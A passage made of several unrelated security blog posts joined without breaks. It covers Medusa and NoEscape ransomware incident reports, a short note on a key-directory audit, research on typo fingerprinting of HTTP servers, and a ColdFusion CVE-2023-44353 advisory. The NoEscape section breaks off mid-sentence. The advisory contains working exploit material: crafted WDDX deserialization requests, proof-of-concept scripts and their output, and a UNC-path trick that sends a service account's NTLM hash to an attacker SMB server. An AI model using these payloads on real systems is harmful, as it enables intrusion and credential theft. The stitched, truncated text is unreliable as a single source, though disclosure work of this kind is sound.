The threat actor conducted the following discovery activity:
Discovery command: Description
nltest /trusted_domains: Enumerates domain trusts
net group 'domain admins' /domain: Enumerates members of the Domain Admins group
net group 'domain computers' /domain: Enumerates domain-joined computers
ipconfig /all: Learns about network configuration and settings
tasklist: Displays a list of currently running processes on the computer
quser: Shows currently logged-on users
whoami: Establishes which user they were running as
wmic os get name: Gathers the name of the operating system
wmic os get osarchitecture: Establishes the operating system architecture
Lateral Movement
Remote Desktop Protocol (RDP) was employed to laterally move through the victim’s network.
Command and Control
A reverse tunnel allowed the threat actor to establish a new connection from a local host to a remote host. The binary c:\programdata\re.exe was executed and connected to 134.195.88[.]27 over port 80 (HTTP). Threat actors tend to use common protocols to blend in with legitimate traffic which can be seen in this case, as port 80 was used.
Additionally, the JWrapper Remote Access application was installed on various servers to maintain access to the environment. AnyDesk was also utilised by the threat actor.
Exfiltration
Data was successfully exfiltrated by the threat actor. The victim’s data was later published to the Medusa leak site.
Impact
The Medusa ransomware in the form of gaze.exe, was deployed to the victim’s network. Files were encrypted, and .MEDUSA was appended to file names. The ransom note was named !!!READ_ME_MEDUSA!!!.txt. System recovery was inhibited due to the deletion of all VMs from the Hyper-V storage as well as local and cloud backups.
In August 2023, Meta engaged NCC Group’s Cryptography Services practice to perform an implementation review of their Auditable Key Directory (AKD) library, which provides an append-only directory of public keys mapped to user accounts and a framework for efficient cryptographic validation of this directory by an auditor. The library is being leveraged to provide an AKD for WhatsApp and is meant to serve as a reference implementation for auditors of the WhatsApp AKD, as well as to allow other similar services to implement key transparency. The review was performed remotely by 3 consultants over a two-week period with a total of 20 person-days spent. The project concluded with a retest phase a few weeks after the original engagement that confirmed all findings were fixed.
At Fox-IT (part of NCC Group), identifying servers that host nefarious activities is a critical aspect of our threat intelligence. One approach involves looking for anomalies in the responses of HTTP servers.
Sometimes cybercriminals who host malicious servers employ tactics that involve mimicking the responses of legitimate software to evade detection. However, a common pitfall of these malicious actors is typos, which we use as unique fingerprints to identify such servers. For example, we have used a single extraneous whitespace character in HTTP responses as a fingerprint to identify servers hosting Cobalt Strike with high confidence [1]. In fact, we have created numerous fingerprints based on textual slip-ups in the HTTP responses of malicious servers, highlighting how fingerprinting these servers can come down to a simple mistake.
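As an illustration of how small such a tell can be, the following sketch (our own toy check, not the production fingerprint) flags a status line that deviates from the expected single-space layout, similar to the extraneous-whitespace slip once used to identify Cobalt Strike servers:

```python
import re

def has_extraneous_space(status_line: str) -> bool:
    """Flag an HTTP/1.x status line with irregular whitespace.

    A well-formed line is "HTTP/<major>.<minor> <code> <reason>" with single
    spaces and no trailing whitespace (reason phrases of at least two
    characters; HTTP/2-style lines are out of scope for this sketch).
    """
    return not re.fullmatch(r"HTTP/\d\.\d \d{3} [^\s].*[^\s]", status_line)

print(has_extraneous_space("HTTP/1.1 200 OK"))          # False: looks legitimate
print(has_extraneous_space("HTTP/1.1 200 OK "))         # True: trailing space
print(has_extraneous_space("HTTP/1.1  404 Not Found"))  # True: double space
```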
HTTP servers are expected to follow the established RFC guidelines of HTTP, producing consistent HTTP responses in accordance with standardized protocols. HTTP responses that are not set up properly can have an impact on the safety and security of websites and web services. With these considerations in mind, we decided to research the possibility of identifying unknown malicious servers by proactively searching for textual errors in HTTP responses.
HTTP response headers and semantics
HTTP is a protocol that governs communication between web servers and clients2. Typically, a client, such as a web browser, sends a request to a server to achieve specific goals, such as requesting to view a webpage. The server receives and processes these requests, then sends back corresponding responses. The client subsequently interprets the message semantics of these responses, for example by rendering the HTML in an HTTP response (see example 1).
An HTTP response includes the status code and status line that provide information on how the server is responding, such as a ‘404 Page Not Found’ message. This status line is followed by response headers. Response headers are key:value pairs, as described in the RFC, that allow the server to provide additional context about the response and tell the client how to process the received data. Ensuring appropriate implementation of HTTP response headers plays a crucial role in preventing security vulnerabilities like Cross-Site Scripting, Clickjacking, Information disclosure, and many others3.
Methodology
The purpose of this research is to identify textual deviations in HTTP response headers and verify the servers behind them to detect new or unknown malicious servers. To accomplish this, we collected a large sample of HTTP responses and applied a spelling-checking model to flag any anomalous responses that contained deviations (see example 3 for an overview of the pipeline). These anomalous HTTP responses were further investigated to determine if they were originating from potentially malicious servers.
Data: Batch of HTTP responses
We sampled approximately 800,000 HTTP responses from public Censys scan data4. We also created a list of common HTTP response header fields, such as ‘Cache-Control’, ‘Expires’, ‘Content-Type’, and a list of typical server values, such as ‘Apache’, ‘Microsoft-IIS’, and ‘Nginx.’ We included a few common status codes like ‘200 OK,’ ensuring that the list contained commonly occurring words in HTTP responses to serve as our reference.
Metric: The Levenshtein distance
To measure typos, we used the Levenshtein distance, an intuitive spelling-checking model that measures the difference between two strings. The distance is calculated by counting the number of operations required to transform one string into the other. These operations can include insertions, deletions, and substitutions of characters. For example, when comparing the words ‘Cat’ and ‘Chat’ using the Levenshtein distance, we would observe that only one operation is needed to transform the word ‘Cat’ into ‘Chat’ (i.e., adding an ‘h’). Therefore, ‘Chat’ has a Levenshtein distance of one compared to ‘Cat’. However, comparing the words ‘Hats’ and ‘Cat’ would require two operations (i.e., changing ‘H’ to ‘C’ and adding an ‘s’ at the end), and therefore, ‘Hats’ would have a Levenshtein distance of two compared to ‘Cat.’
The Levenshtein distance can be made sensitive to capitalization and any character, allowing for the detection of unusual additional spaces or lowercase characters, for example. This measure can be useful for identifying small differences in text, such as those that may be introduced by typos or other anomalies in HTTP response headers. While HTTP header keys are case-insensitive by specification, our model has been adjusted to consider any character variation. Specifically, we have made the ‘Server’ header case-sensitive to catch all nuances of the server’s identity and possible anomalies.
Our model performs a comparative analysis between our predefined list (of commonly occurring HTTP response headers and server values) and the words in the HTTP responses. It is designed to return words that are nearly identical to those of the list but includes small deviations. For instance, it can detect slight deviations such as ‘Content-Tyle’ instead of the correct ‘Content-Type’.
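The edit-distance comparison described above can be sketched in a few lines of Python. This is a simplified stand-in for our actual pipeline; the reference list and distance threshold shown here are illustrative only:

```python
# Reference list of commonly occurring header names and server values (abbreviated).
KNOWN_WORDS = ["Cache-Control", "Expires", "Content-Type", "Content-Length",
               "Apache", "Microsoft-IIS", "nginx"]

def levenshtein(a: str, b: str) -> int:
    """Count the insertions, deletions and substitutions needed to turn a into b.

    The comparison is case-sensitive, so e.g. 'CloudFlare' vs 'Cloudflare' scores 1.
    """
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        curr = [i]
        for j, cb in enumerate(b, 1):
            curr.append(min(prev[j] + 1,                 # deletion
                            curr[j - 1] + 1,             # insertion
                            prev[j - 1] + (ca != cb)))   # substitution
        prev = curr
    return prev[-1]

def flag_anomalies(words, max_distance=2):
    """Return words that are close to, but not exactly equal to, a known word."""
    anomalies = []
    for word in words:
        for known in KNOWN_WORDS:
            distance = levenshtein(word, known)
            if 0 < distance <= max_distance:
                anomalies.append((word, known, distance))
                break
    return anomalies
```

For instance, flag_anomalies(['Content-Tyle', 'Expires']) flags ‘Content-Tyle’ as a near-miss of ‘Content-Type’ while leaving the correctly spelled ‘Expires’ alone.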
Output: A list with anomalous HTTP responses
The model returned a list of two hundred anomalous HTTP responses from our batch of HTTP responses. We decided to check the frequency of these anomalies over the entire scan dataset, rather than the initial sample of 800,000 HTTP responses. Our aim was to get more context regarding the prevalence of these spelling errors.
We found that some of these anomalies were relatively common among HTTP response headers. For example, we discovered more than eight thousand instances of the HTTP response header ‘Expired’ instead of ‘Expires.’ Additionally, we saw almost three thousand instances of server names that deviated from the typical naming convention of ‘Apache’ as can be seen in table 1.
Deviation               Common name             Amount
Server: Apache Coyote   Server: Apache-Coyote   2941
Server: Apache \r\n     Server: Apache          2952
Server: Apache.         Server: Apache          3047
Server: CloudFlare      Server: Cloudflare      6615
Expired:                Expires:                8260
Table 1: Frequency of deviations in HTTP responses online
Refining our research: Delving into the rarest anomalies
However, the rarest anomalies piqued our interest, as they could potentially indicate new or unknown malicious servers. We narrowed our investigation by only analyzing HTTP responses that appeared less than two hundred times in the wild and cross-referenced them with our own telemetry. By doing this, we could obtain more context from surrounding traffic to investigate potential nefarious activities. In the following section, we will focus on the most interesting typos that stood out and investigate them based on our telemetry.
Findings
Anomalous server values
During our investigation, we came across several HTTP responses that displayed deviations from the typical naming conventions of the values of the ‘Server’ header.
For instance, we encountered an HTTP response header where the ‘Server’ value was written differently than the typical ‘Microsoft-IIS’ servers. In this case, the header read ‘Microsoft -IIS’ instead of ‘Microsoft-IIS’ (note the space) as shown in example 3. We suspected that this deviation was an attempt to make it appear like a ‘Microsoft-IIS’ server response. However, our investigation revealed that a legitimate company was behind the server, which did not immediately indicate any nefarious activity. Therefore, even though the typo in the server’s name was suspicious, it did not turn out to come from a malicious server.
The ‘ngengx’ server value appeared to intentionally mimic the common server name ‘nginx’ (see example 4). We found that it was linked to a cable setup account from an individual that subscribed to a big telecom and hosting provider in The Netherlands. This deviation from typical naming conventions was strange, but we could not find anything suspicious in this case.
Similarly, the ‘Apache64’ server value deviates from the standard ‘Apache’ server value (see example 5). We found that this HTTP response was associated with webservers of a game developer, and no apparent malevolent activities were detected.
While these deviations from standard naming conventions could potentially indicate an attempt to disguise a malicious server, they do not always indicate nefarious activity.
Anomalous response headers
Moreover, we encountered HTTP response headers that deviated from the standard naming conventions. The ‘Content-Tyle’ header deviated from the standard ‘Content-Type’ header, and we found both the correct and incorrect spellings within the HTTP response (see example 6). We discovered that these responses originated from ‘imgproxy,’ a service designed for image resizing. This service appears to be legitimate. Indeed, a review of the source code confirms that the ‘Content-Tyle’ header is hardcoded in the landing page (see example 7).
Similarly, the ‘CONTENT_LENGTH’ header deviated from the standard spelling of ‘Content-Length’ (see example 7). However, upon further investigation, we found that the server behind this response also belongs to a server associated with webservers of a game developer. Again, we did not detect any malicious activities associated with this deviation from typical naming conventions.
The findings of our research seem to reveal that even HTTP responses set up by legitimate companies include messy and incorrect response headers.
Concluding Insights
Our study was designed to uncover potentially malicious servers by proactively searching for spelling mistakes in HTTP response headers. HTTP servers are generally expected to adhere to the established RFC guidelines, producing consistent HTTP responses as dictated by the standard protocols. Sometimes cybercriminals hosting malicious servers attempt to evade detection by imitating standard responses of legitimate software. However, sometimes they slip up, leaving inadvertent typos, which can be used for fingerprinting purposes.
Our study reveals that typos in HTTP responses are not as rare as one might assume. Despite the crucial role that appropriate implementation of HTTP response headers plays in the security and safety of websites and web services, our research suggests that textual errors in HTTP responses are surprisingly widespread, even in the outputs of servers from legitimate organizations. Although these deviations from standard naming conventions could potentially indicate an attempt to disguise a malicious server, they do not always signify nefarious activity. The internet is simply too messy.
Our research concludes that typos alone are insufficient to identify malicious servers. Nevertheless, they retain potential as part of a broader detection framework. We propose advancing this research by combining the presence of typos with additional metrics. One approach involves establishing a baseline of common anomalous HTTP responses, and then flagging HTTP responses with new typos as they emerge.
Furthermore, more research could be conducted regarding the order of HTTP headers. If the header order in the output differs from what is expected from a particular software, in combination with (new) typos, it may signal an attempt to mimic that software.
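As a toy illustration of the idea, assuming a hypothetical baseline of the order in which a given piece of software emits headers, such a check might look like the following (the EXPECTED_ORDER list is invented for illustration and is not a real software fingerprint):

```python
# Hypothetical baseline: the relative order in which some software emits headers.
EXPECTED_ORDER = ["Server", "Date", "Content-Type", "Content-Length"]

def order_matches(observed_headers, expected=EXPECTED_ORDER):
    """True if the baseline headers that are present appear in the expected relative order."""
    positions = [observed_headers.index(h) for h in expected if h in observed_headers]
    return positions == sorted(positions)
```

A response that sends ‘Date’ before ‘Server’ would then fail the check, and combined with a typo in the same response, could be flagged as a possible mimicry attempt.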
Lastly, this strategy could be integrated with other modelling approaches, such as data science models in Security Operations Centers. For instance, monitoring servers that are not only new to the network but also exhibit spelling errors. By integrating these efforts, we strive to enhance our ability to detect emerging malicious servers.
This post will delve into a recent incident response engagement handled by NCC Group’s Cyber Incident Response Team (CIRT) involving the Ransomware-as-a-Service known as NoEscape.
Below is a summary of the findings presented in this blog post:
Initial access gained via a publicly disclosed vulnerability in an externally facing server
Use of vulnerable drivers to disable security controls
Remote Desktop Protocol was used for Lateral Movement
Access persisted through tunnelling RDP over SSH
Exfiltration of data via Mega
Execution of ransomware via scheduled task
NoEscape
NoEscape is a new financially motivated ransomware group delivering a Ransomware-as-a-Service program which was first observed in May 2023 being advertised on a dark web forum, as published by Cyble [1]. It is believed they are a spin-off of the group that used to be known as Avaddon. This post will focus on the Tactics, Techniques and Procedures employed by a threat actor utilising NoEscape Ransomware in a recent Incident Response Engagement.
Review of the NoEscape dark web portal and their list of victims shows no trends in industries targeted, which suggests they are opportunistic in nature. To date, 89 victims (18 active) have been posted on the NoEscape portal, with the first being published on 14th June 2023. Monetary gain is the main objective of this ransomware group. In addition to the usual double extortion method of ransomware and data exfiltration which has been popular in recent years, NoEscape also has a third extortion method: the ability to purchase a DDoS/Spam add-on to further impact victims.
Incident Overview
NoEscape appear to target vulnerable external services, with the initial access vector being via the exploitation of a Microsoft Exchange server which was publicly facing in the victim’s environment. Exploitation led to webshells being created on the server and gave the threat actor an initial foothold into the environment.
The threat actor seemed opportunistic in nature, with an objective of monetary gain via the double extortion method of ransomware combined with data exfiltration. However, they did appear low skilled due to the kitchen-sink approach employed when trying to disable antivirus and dump credentials. Multiple different tools were deployed to perform the same job, which is quite a noisy approach rarely observed from more sophisticated threat actors.
A secondary access method was deployed to ensure continued access in the event that the initial access vector was closed to the threat actor. Data was exfiltrated to a well-known cloud storage provider; however, this was interrupted due to premature execution of the ransomware, which encrypted files that were being exfiltrated.
Timeline
T – Initial Access gained via webshell
T+1 min – Initial recon and credential dumping activity
T+9 min – Secondary access method established via Plink
T+18 days – Second phase of credential dumping activity
T+33 days – Data Exfiltration
T+33 days – Ransomware Executed
Mitre TTPs
Initial Access
T1190 – Exploit Public-Facing Application
In keeping with the opportunistic nature, initial access was gained through exploiting the vulnerabilities CVE-2021-34473, CVE-2021-34523 and CVE-2021-31207 which are more commonly known as ProxyShell.
Web shells were uploaded to the victim’s Microsoft Exchange server and gave the threat actor an initial foothold on the network.
Execution
T1059.001 – Command and Scripting Interpreter: PowerShell
PowerShell was utilised by the threat actor, using the Defender command Set-MpPreference to exclude specific paths from being monitored. This was an attempt to ensure webshells were not detected and remediated by the antivirus.
T1059.003 – Command and Scripting Interpreter: Windows Command Shell
Windows native commands were executed during the discovery phase; targeting domain admin users, antivirus products installed etc.
net localgroup administrators
cmd.exe /c net group "REDACTED" /domain
cmd.exe /c WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName /Format:List
T1053.005 – Scheduled Task
As has been well documented [2], a Scheduled Task with the name SystemUpdate was used to execute the ransomware.
Persistence
T1505.003 – Server Software Component: Web Shell
Web Shells provided the threat actor continued access to the estate through the initial access vector.
Privilege Escalation
T1078.002 – Valid Accounts: Domain Accounts
The threat actor gained credentials for valid domain accounts which were used for the majority of lateral movement and execution.
T1078.003 – Valid Accounts: Local Accounts
The threat actor was observed enabling the DefaultAccount and utilising this to execute their tools locally on a host.
Defence Evasion
T1562.001 – Impair Defences: Disable or Modify Tools
The threat actor showed their potential lack of experience as multiple different drivers were dropped in an attempt to disable the deployed EDR and AV. Instead of deploying a single driver, multiple drivers and tools were dropped in a ‘throw the kitchen sink at it’ approach.
File
Description
Gmer.exe
GMER is a rootkit detector and remover, utilised by threat actors to identify and kill processes such as antivirus and EDR
aswArPot.sys
An Avast antivirus driver deployed by threat actors to disable antivirus solutions.
mhyprot2.sys
Genshin Impact anti-cheat driver which is utilised by threat actors to kill antivirus processes.
Credential Access
T1003 – Credential Dumping
Similar to the above, multiple credential dumping tools were dropped by the threat actor in an attempt to obtain legitimate credentials.
File
Description
CSDump.exe
Unknown dumping tool (no longer on disk)
Fgdump.exe
A tool for mass password auditing of Windows systems by dumping credentials from LSASS
MemoryDumper.exe
Creates an encrypted memory dump from the LSASS process to facilitate offline cracking of password hashes.
Discovery
T1087.001 – Account Discovery: Local Account
A number of inbuilt Windows commands were used to gain an understanding of the members of the local administrators group:
net localgroup administrators
net group “REDACTED” /domain
T1018 – Remote System Discovery
Similarly, inbuilt Windows commands were also used to discover information on the network, such as the primary domain controller for the estate:
netdom query /d:REDACTEDPDC
Lateral Movement
T1021.001 – Remote Desktop Protocol
Valid domain credentials were obtained through dumping the LSASS process; these accounts were then used to laterally move across the environment via RDP.
Command and Control
T1572 – Protocol Tunnelling
A secondary method of access was deployed by the threat actor, in the event that the initial access vector was closed, by deploying PuTTY Link onto multiple hosts in the environment. An SSH tunnel was created to present RDP access to the host from a public IP address owned by the threat actor.
The threat actor also utilised software already deployed onto the estate to maintain access, in this scenario obtaining credentials to the TeamViewer deployment.
Exfiltration
T1048.002 – Exfiltration Over Alternative Protocol: Exfiltration Over Asymmetric Encrypted Non-C2 Protocol
As has become common when data is exfiltrated from a victim’s estate in recent years, the MegaSync.exe utility was used to exfiltrate data from the estate directly to Mega’s cloud storage platform.
Impact
T1486 – Data Encrypted for Impact
The encryptor targeted all files on the C:\ drive except those with the below extensions:
Initial Access
Exploit Public-Facing Application
T1190
The vulnerabilities CVE-2021-34473, CVE-2021-34523 and CVE-2021-31207, commonly known as ProxyShell, were exploited
Execution
Command and Scripting Interpreter: PowerShell
T1059.001
PowerShell was utilized to add an exclusion path to the anti-virus to prevent the web shells from being detected
Execution
Command and Scripting Interpreter: Windows Command Shell
T1059.003
Native Windows commands were utilised during the discovery phase of the endpoint and victim estate
Execution
Scheduled Task
T1053.005
A scheduled task was utilised to execute the ransomware binary
Persistence
Server Software Component: Web Shell
T1505.003
Web Shells were uploaded to the Exchange server via exploitation of the ProxyShell vulnerabilities
Privilege Escalation
Valid Accounts: Domain Accounts
T1078.002
Credentials to domain accounts were obtained and utilised for lateral movement
Privilege Escalation
Valid Accounts: Local Accounts
T1078.003
A disabled local account was re-enabled by the threat actor and used.
Defence Evasion
Impair Defenses: Disable or Modify Tools
T1562.001
Tooling was deployed in an attempt to disable the deployed endpoint security controls
Credential Access
Credential Dumping
T1003
Various different tools were deployed to dump credentials from LSASS
Discovery
Account Discovery: Local Account
T1087.001
The ‘net’ native Windows command was utilised to discover users in the domain administrators group
Discovery
Remote System Discovery
T1018
‘netdom’ was utilised to discover the primary domain controller for the victim’s estate
Lateral Movement
Remote Desktop Protocol
T1021.001
The primary method of lateral movement was RDP
Command and Control
Protocol Tunnelling
T1572
PuTTY link, also known as Plink, was used to tunnel RDP connections over SSH to provide the threat actor with direct access to the Exchange server as back-up to the web shells
Command and Control
Remote Access Software
T1219
Access was gained to the existing TeamViewer deployment and utilised for lateral movement
Exfiltration
Exfiltration Over Alternative Protocol: Exfiltration Over Asymmetric Encrypted Non-C2 Protocol
T1048.002
MegaSync was utilised to exfiltrate data to the cloud storage solution Mega
Vendor: Adobe
Vendor URL: https://www.adobe.com/uk/products/coldfusion-family.html
Versions affected:
* Adobe ColdFusion 2023 Update 5 and earlier versions
* Adobe ColdFusion 2021 Update 11 and earlier versions
Systems Affected: All
Author: McCaulay Hudson ([email protected])
Advisory URL: https://helpx.adobe.com/security/products/coldfusion/apsb23-52.html
CVE Identifier: CVE-2023-44353
Risk: 5.3 Medium (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N)
Adobe ColdFusion allows software developers to rapidly build web
applications. Recently, a critical vulnerability was identified in the
handling of Web Distributed Data eXchange (WDDX) requests to ColdFusion
Markup (CFM) endpoints. Multiple patches were released by Adobe to
resolve the vulnerability, and each has been given its own CVE and Adobe
security update:
From patch diffing, it was observed that the patch uses a deny list
in the serialfilter.txt file to prevent specific packages
from being executed in the deserialization attack. However, multiple
packages were identified which did not exist in the deny list by
default. This could be leveraged to perform enumeration of the
ColdFusion server, or to set certain configuration values.
The vulnerabilities identified in this post were tested against
ColdFusion 2023 Update 3 (packaged with Java JRE 17.0.6) using a default
installation. No additional third-party libraries or dependencies were
used or required for these specific vulnerabilities identified.
Impact
The vulnerabilities identified allowed an unauthenticated remote
attacker to:
* Obtain the ColdFusion service account NTLM password hash when the service was not running as SYSTEM
* Verify if a file exists on the underlying operating system of the ColdFusion instance
* Verify if a directory exists on the underlying operating system of the ColdFusion instance
* Set the Central Config Server (CCS) Cluster Name configuration in the ccs.properties file
* Set the Central Config Server (CCS) Environment configuration in the ccs.properties file
Being able to determine if a directory exists on the ColdFusion
system remotely may aid attackers in further attacks against the system.
For example, an attacker could enumerate the valid user accounts on the
system by brute forcing the C:\Users\ or
/home/ directories.
File or directory enumeration could also be used to determine the
underlying operating system type and version. Changing the Central
Config Server’s environment to development or beta may increase the
attack surface of the server for further attacks. Finally, obtaining the
service account NTLM hash of the user running ColdFusion may be used to
tailor further attacks such as cracking the hash to a plaintext
password, or pass-the-hash
attacks.
Details
The deserialization attack has been discussed in detail previously by
Harsh Jaiswal in the blog post Adobe
ColdFusion Pre-Auth RCE(s). The vulnerabilities discussed in this
document are an extension of that attack, utilising packages which are
currently not in the default deny list.
Due to the constraints of the deserialization attack, the following
conditions must be met in order to execute a Java function within the
ColdFusion application:
* The class must contain a public constructor with zero arguments
* The target function must begin with the word set
* The target function must not be static
* The target function must be public
* The target function must have one argument
* Multiple public non-static single argument set functions can be chained in a single request
* Must not exist in the cfusion/lib/serialfilter.txt deny list
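Based on the argumentCollection bodies shown in the examples later in this post, such a WDDX packet can be assembled programmatically. The sketch below builds the packet for an arbitrary target class and set of setter calls (XML escaping of values is omitted for brevity):

```python
def wddx_packet(java_class: str, setters: dict) -> str:
    """Build a WDDX packet whose deserialization calls set<Name>(String) per entry.

    Each <var name='env'>-style element maps onto a setEnv()-style setter, so
    several vars inside one struct chain multiple setter calls in one request.
    """
    vars_xml = "".join(
        f"<var name='{name}'><string>{value}</string></var>"
        for name, value in setters.items()
    )
    return (
        "<wddxPacket version='1.0'><header/><data>"
        f"<struct type='x{java_class}x'>"
        f"{vars_xml}</struct></data></wddxPacket>"
    )
```

For example, wddx_packet('coldfusion.centralconfig.client.CentralConfigClientUtil', {'clusterName': 'EXAMPLE'}) reproduces the request body shown in the CCS cluster name section of this post.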
ColdFusion 2023 Update 3 contained the following
cfusion/lib/serialfilter.txt file contents:
Adhering to those restrictions, the following functions were identified which provided an attacker with useful information on the target system.
* File existence – coldfusion.tagext.net.LdapTag.setClientCert
* Directory existence – coldfusion.tagext.io.cache.CacheTag.setDirectory
* Set CCS cluster name – coldfusion.centralconfig.client.CentralConfigClientUtil.setClusterName
* Set CCS environment – coldfusion.centralconfig.client.CentralConfigClientUtil.setEnv
The proof of concept coldfusion-wddx.py script has been
provided at the end of this post. The following examples use multiple IP
addresses which correspond to the following servers:
192.168.198.128 – Attacker controlled server
192.168.198.129 – Linux ColdFusion server
192.168.198.136 – Windows ColdFusion server
File existence – coldfusion.tagext.net.LdapTag.setClientCert
The setClientCert function in the LdapTag class could be remotely executed by an unauthenticated attacker to perform multiple different attacks. The function definition can be seen below:

public void setClientCert(String keystore) {
    if (!new File(keystore).exists()) {
        throw new KeyStoreNotFoundException(keystore);
    }
    this.keystore = keystore;
}
In this scenario, the attacker can control the keystore
string parameter from the crafted HTTP request. An example HTTP request
to exploit this vulnerability can be seen below:
Executing this function allows an attacker to check if a file on the filesystem exists. If a file was present, the server would respond with an HTTP status 500. However, if the file did not exist on the target system, the server would respond with an HTTP status 200. This can be seen using the provided coldfusion-wddx.py PoC script:
The Java File
specification states that the path can be a Microsoft Windows UNC
pathname. An attacker can therefore provide a UNC path of an attacker
controlled SMB server. This will cause the ColdFusion application to
connect to the attacker’s SMB server. Once the connection has occurred,
the NTLM hash of the ColdFusion service account will be leaked to the
attacker’s SMB server. However, the NTLM hash is only leaked if the
ColdFusion service is not running as the SYSTEM user. It
should be noted that by default, the ColdFusion service runs as the
SYSTEM user, however Adobe recommends hardening this in the
Adobe
ColdFusion 2021 Lockdown Guide in section “6.2 Create a Dedicated
User Account for ColdFusion”.
In the following example, the ColdFusion service has been hardened to
run as the coldfusion user, instead of the default
SYSTEM user.
An SMB server is hosted using smbserver.py
on the attacker’s machine:
The smbserver.py
output shows that the ColdFusion server connected to the attacker’s SMB
server, which resulted in the ColdFusion account Net-NTLMv2 hash being
leaked:
[*] Incoming connection (192.168.198.136,53483)
[*] AUTHENTICATE_MESSAGE (DESKTOP-J10AQ1P\coldfusion,DESKTOP-J10AQ1P)
[*] User DESKTOP-J10AQ1P\coldfusion authenticated successfully
[*] coldfusion::DESKTOP-J10AQ1P:aaaaaaaaaaaaaaaa:10a621e4f3b9a4b311ef62b45d3c94fd:0101000000000000808450406ecbd901702ffe4197ae622300000000010010006900790064006100520073004b004400030010006900790064006100520073004b0044000200100071004300780052007a005900410059000400100071004300780052007a0059004100590007000800808450406ecbd90106000400020000000800300030000000000000000000000000300000c23fddb9ebd5ba3c293612e488cfa07300752e0ee89205bfbdade370d11ab4520a001000000000000000000000000000000000000900280063006900660073002f003100390032002e003100360038002e003100390038002e003100320038000000000000000000
[*] Closing down connection (192.168.198.136,53483)
The hash can then be cracked using tools such as John the Ripper or Hashcat. As shown in the
following output, the coldfusion user had the Windows
account password of coldfusion.
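For illustration, the 500-versus-200 behaviour described above can be probed with a short standalone script using only the Python standard library. The endpoint path follows the examples in this post; the 'clientCert' variable name is inferred from the setClientCert setter naming convention and should be treated as an assumption:

```python
import urllib.error
import urllib.parse
import urllib.request

# Endpoint used throughout the examples in this post.
ENDPOINT = "/CFIDE/wizards/common/utils.cfc?method=wizardHash&inPassword=foo&_cfclient=true"

def file_exists_packet(path: str) -> str:
    # WDDX packet targeting coldfusion.tagext.net.LdapTag; the 'clientCert'
    # var name maps onto the setClientCert(String) setter (assumed naming).
    return ("<wddxPacket version='1.0'><header/><data>"
            "<struct type='xcoldfusion.tagext.net.LdapTagx'>"
            f"<var name='clientCert'><string>{path}</string></var>"
            "</struct></data></wddxPacket>")

def file_exists(host: str, path: str) -> bool:
    body = urllib.parse.urlencode({"argumentCollection": file_exists_packet(path)}).encode()
    try:
        urllib.request.urlopen(f"http://{host}{ENDPOINT}", data=body, timeout=10)
        return False   # HTTP 200: file does not exist
    except urllib.error.HTTPError as err:
        return err.code == 500   # HTTP 500: file exists
```

This mirrors the behaviour of the file-exist command in the provided coldfusion-wddx.py script, but is intentionally stripped down to the packet construction and the status-code check.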
Directory existence – coldfusion.tagext.io.cache.CacheTag.setDirectory
Similar to file existence, it is also possible to determine if a
directory exists by leveraging the setDirectory function in
the CacheTag class. The function is defined as:
In this case, the directory variable can be controlled
by an unauthenticated request to the ColdFusion server. Once the
functionality has passed various helper methods, it checks whether the
directory exists and responds with an HTTP status 500 when it does exist,
and an HTTP status 200 when it does not. An example HTTP request can
be seen below:
The helper function VSFileFactory.getFileObject uses the
Apache
Commons VFS Project for additional file system support. The list of
supported file systems can be seen in the
cfusion/lib/vfs-providers.xml file.
File System – HTTP/HTTPS
The HTTP(S) schemas allow you to perform an HTTP(S) HEAD request on
behalf of the ColdFusion server. In the following example, a HTTP server
is hosted on the attacker machine:
└─$ sudo python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80(http://0.0.0.0:80/) ...
The request is then triggered with a path of the attacker’s web
server:
└─$ python3 coldfusion-wddx.py 192.168.198.129 directory-exist http://192.168.198.128/
[#] Target: http://192.168.198.129/CFIDE/wizards/common/utils.cfc?method=wizardHash&inPassword=bar&_cfclient=true
[-] Directory does not exist
This then causes a HTTP(S) HEAD request to be sent to the server:
The remaining supported filesystems were not tested, however it is
likely they can be used to enumerate directories for the given
filesystem.
Set CCS Cluster Name – coldfusion.centralconfig.client.CentralConfigClientUtil.setClusterName
It was possible to set the Central Config Server (CCS) Cluster Name
setting by executing the setClusterName function inside the
CentralConfigClientUtil class. The function is defined
as:
An attacker can control the cluster parameter and set
the cluster name to any value they choose. An example HTTP request to
trigger the vulnerability is shown below:
POST /CFIDE/wizards/common/utils.cfc?method=wizardHash&inPassword=foo&_cfclient=true HTTP/1.1
Host: 192.168.198.129
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 216
argumentCollection=<wddxPacket version='1.0'><header/><data><struct type='xcoldfusion.centralconfig.client.CentralConfigClientUtilx'><var name='clusterName'><string>EXAMPLE</string></var></struct></data></wddxPacket>
Additionally, the provided PoC script can be used to simplify setting
the CCS cluster name:
└─$ python3 coldfusion-wddx.py 192.168.198.129 ccs-cluster-name EXAMPLE
[#] Target: http://192.168.198.129/CFIDE/wizards/common/utils.cfc?method=wizardHash&inPassword=bar&_cfclient=true
[+] Set CCS cluster name
Once the request has been processed by the ColdFusion server, the
clustername property in the
cfusion/lib/ccs/ccs.properties file is set to the attacker
controlled value, and the cluster name is used by the ColdFusion
server.
Set CCS Environment – coldfusion.centralconfig.client.CentralConfigClientUtil.setEnv
Similar to setting the CCS cluster name, an attacker can also set the
CCS environment by executing the setEnv function inside the
CentralConfigClientUtil class as shown below:
public void setEnv(String env) {
    if (ccsEnv.equals(env)) {
        return;
    }
    ccsEnv = env;
    CentralConfigClientUtil.storeCCSServerConfig();
    CentralConfigRefreshServlet.reloadAllModules();
}
An example HTTP request to execute this function with the attacker
controlled env variable can be seen below:
POST /CFIDE/wizards/common/utils.cfc?method=wizardHash&inPassword=foo&_cfclient=true HTTP/1.1
Host: 192.168.198.129
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 212
argumentCollection=<wddxPacket version='1.0'><header/><data><struct type='xcoldfusion.centralconfig.client.CentralConfigClientUtilx'><var name='env'><string>development</string></var></struct></data></wddxPacket>
The PoC Python script command ccs-env automates sending
this request:
└─$ python3 coldfusion-wddx.py 192.168.198.129 ccs-env development
[#] Target: http://192.168.198.129/CFIDE/wizards/common/utils.cfc?method=wizardHash&inPassword=bar&_cfclient=true
[+] Set CCS environment
Finally, the environment property in the cfusion/lib/ccs/ccs.properties file is changed to the attacker-controlled value.
